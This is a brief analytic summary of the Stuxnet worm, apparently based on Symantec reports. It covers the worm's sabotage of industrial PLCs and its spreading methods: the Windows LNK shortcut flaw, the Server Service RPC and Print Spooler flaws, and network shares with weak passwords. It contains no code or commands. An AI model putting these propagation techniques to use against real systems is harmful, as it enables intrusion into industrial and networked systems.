The Stuxnet computer worm is perhaps the most complicated piece of malicious software ever built.
The worm targets industrial control systems in order to take control of industrial facilities. The ultimate goal of Stuxnet is to sabotage such a facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend, most likely outside their specified boundaries. Stuxnet was discovered in July 2010, but is confirmed to have existed at least one year prior and likely even before. The majority of infections were found in Iran. The attackers' exact motives were unclear at the time of discovery, but a payload that rewrites PLC logic points to sabotage rather than the industrial espionage that was initially speculated. Incredibly, Stuxnet exploits four zero-day vulnerabilities, which is unprecedented.
Stuxnet was the first piece of malware to exploit the Microsoft Windows Shortcut 'LNK/PIF' Files Automatic File Execution Vulnerability (BID 41732) in order to spread. The worm drops a copy of itself as well as a shortcut (.lnk) pointing to that copy on a removable drive. When the drive is attached to a system and browsed with an application that displays icons, such as Windows Explorer, the shortcut causes the copy of the worm to run. Due to a design flaw in Windows, applications that display icons could also inadvertently load code, and in Stuxnet's case the .lnk file points to a copy of the worm on the same removable drive; no double-click is needed. Furthermore, Stuxnet also exploits the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (BID 31874), which was notably used with incredible success by W32.Downadup (a.k.a. Conficker), as well as the Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability (BID 43073). The worm also attempts to spread by copying itself to network shares protected by weak passwords.
Reference:
[W32.Stuxnet]
http://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99
The Hackers Behind Stuxnet
https://www-secure.symantec.com/connect/blogs/hackers-behind-stuxnet
W32.Stuxnet Dossier
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w3
2_stuxnet_dossier.pdf
Stuxnet 0.5: The Missing Link
https://www-secure.symantec.com/connect/blogs/stuxnet-05-missing-link
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/stux
net_0_5_the_missing_link.pdf
